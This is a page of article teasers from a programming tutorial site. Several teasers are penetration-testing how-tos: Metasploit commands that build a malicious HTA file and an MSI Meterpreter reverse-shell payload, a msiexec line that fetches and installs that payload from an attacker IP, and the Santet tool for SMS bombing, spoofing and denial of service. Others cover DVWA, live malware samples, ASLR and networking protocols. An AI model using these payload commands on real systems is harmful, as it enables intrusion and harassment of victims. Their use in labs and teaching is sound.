Article Categories
- All Categories
-
Data Structure
-
Networking
-
RDBMS
-
Operating System
-
Java
-
MS Excel
-
iOS
-
HTML
-
CSS
-
Android
-
Python
-
C Programming
-
C++
-
C#
-
MongoDB
-
MySQL
-
Javascript
-
PHP
MCA Articles
Page 55 of 94
Pentesting using Docker
You will learn how to configure vulnerable web applications (DVWA) with the help of docker in easy steps. Docker is a third-party tool developed to create an isolated environment to execute any application. These applications are run using containers. These containers are unique because they bring together all the dependencies of an application into a single package and deploy it. Hit these commands to install and configure it as;apt updateapt install docker.iosystemctl start dockersystemctl enable dockerConfigure DVWA on DockerDamn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid ...
Read MoreTheZoo Repository Live Malware Analysis
theZoo's allows the study of malware and enable people who are interested in malware analysis to have access to live malware, analyse the ways they operate, and maybe even enable advanced and savvy people to block specific malware within their own environment.git clone https://github.com/ytisf/theZoocd theZoopip install --user -r requirements.txtpython theZoo.pyI recommend running them in a VM which has no internet connection (or an internal virtual network if you must) and without guest additions or any equivalents. Some of them are worms and will automatically try to spread out. Running them unconstrained means that you will infect yourself or others with ...
Read MoreHacking with HTA file (MSHTA.exe)
The Windows OS utility responsible for running HTA( HTML Application) files that we can run with JavaScript or VBScript. You can interpret these files using the Microsoft MSHTA.exe tool.Metasploit contain the “HTA Web Server” module which generates malicious hta file. This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell.Malicious HTA fileOpen metasploit in Kali linux and hit the following commands to generate a malicious HTA file as;use exploit/windows/misc/hta_serverset srvhost 192.168.1.109set lhost 192.168.1.109exploitNow run the malicious code on the target machine through mshta.exe on the victim’s machine to obtain meterpreter sessions.
Read MoreHacking with Santet
This article articulates how to hack using Santet tool which has several different attacks built into one package. It allows you to create payload, Hijack Facebook Group, perform SMS bomber and SMS Spoof attack and finally Denial of Service attack. Follow the instruction below to learn how to install Santet and use it further.Turn on your Kali machine, open a terminal and type ingit clonehttps://github.com/Gameye98/santet-onlineNow change your current directory to santet using the cd command − cd santet-onlineNow give execute permission to the santet.py file by executing this command − chmod -x santet.py, now run python santet.py as following;If everything ...
Read MoreGet the Reverse Shell with MSI package
Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. The executable program that interprets packages and installs products is Msiexec.exe.Launch msiexec attack via msfvenomLet’s generate an MSI Package file (1.msi) utilizing the Windows Meterpreter payload as follows;msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msiAt the target end, when the victim execute the 1.msi file on the remote machine with the following utiliy;msiexec /q /i http://192.168.1.109/1.msiThe attacker get the reverse shell of the victim machine by starting multi/handler as the listener.use exploit/multi/handlerset pyaload windows/meterpreter/reverse_tcpset lhost 192.168.1.109exploit
Read MoreAddress Space Layout Randomization (ASLR)
Memory corruption vulnerabilities have plagued software for decades, despite efforts by large companies like Apple, Google, and Microsoft to eradicate them. This article presents some basic facts about ASLR, focusing on the Windows implementation. In addition to covering what ASLR accomplishes to improve security posture, we aim to give defenders advice on how to improve the security of their software, and to give researchers more insight into how ASLR works and ideas for investigating its limitations.Memory corruption vulnerabilities occur when a program mistakenly writes attacker-controlled data outside of an intended memory region or outside intended memory’s scope. This may crash ...
Read MoreWhat is Carrier Sense Multiple Access (CSMA)?
Carrier Sense Multiple Access (CSMA) is a network protocol for carriertransmission that operates in the Medium Access Control (MAC) layer. It senses or listens whether the shared channel for transmission is busy or not, and transmits if the channel is not busy. Using CMSA protocols, more than one users or nodes send and receive data through a shared medium that may be a single cable or optical fiber connecting multiple nodes, or a portion of the wireless spectrum.Working PrincipleWhen a station has frames to transmit, it attempts to detect presence of the carrier signal from the other nodes connected to ...
Read MoreThe IEEE 802.1Q Standard
The IEEE 802.1Q networking standard lays down the specifications for VLANs (Virtual Local Area Networks or Virtual LANs) on an IEEE 802.3 Ethernet network. The standard is generally referred as Dot1Q. VLANs are a logical group of computers that appear to be on the same LAN irrespective of the configuration of the underlying physical network. Network administrators partition the networks to match the functional requirements of the VLANs so that each VLAN comprise of a subset of ports on a single or multiple switches or bridges. This allows computers and devices in a VLAN to communicate in the simulated environment ...
Read MoreSpanning Tree Protocol
Spanning Tree Protocol (STP) is a communication protocol operating at data link layer the OSI model to prevent bridge loops and the resulting broadcast storms. It creates a loop − free topology for Ethernet networks.Working PrincipleA bridge loop is created when there are more than one paths between two nodes in a given network. When a message is sent, particularly when a broadcast is done, the bridges repeatedly rebroadcast the same message flooding the network. Since a data link layer frame does not have a time-to-live field in the header, the broadcast frame may loop forever, thus swamping the channels.Spanning ...
Read MoreWhat is Wormhole switching?
In data communications, wormhole switching a flow control technique where large data frames or packets are partitioned and then transmitted. When a switching device (a bridge or a switch) receives a data packet, it partitions the packet into small parts called flow control units or flits. The flits are transmitted one by one instead of the whole packet. Also called wormhole flow control, wormhole switching is subtype of flit-buffer flow control methods and is based upon fixed links.Working PrincipleIn this technique, each packet or frame is broken into smaller pieces of data called flits. The header flits contain the destination ...
Read More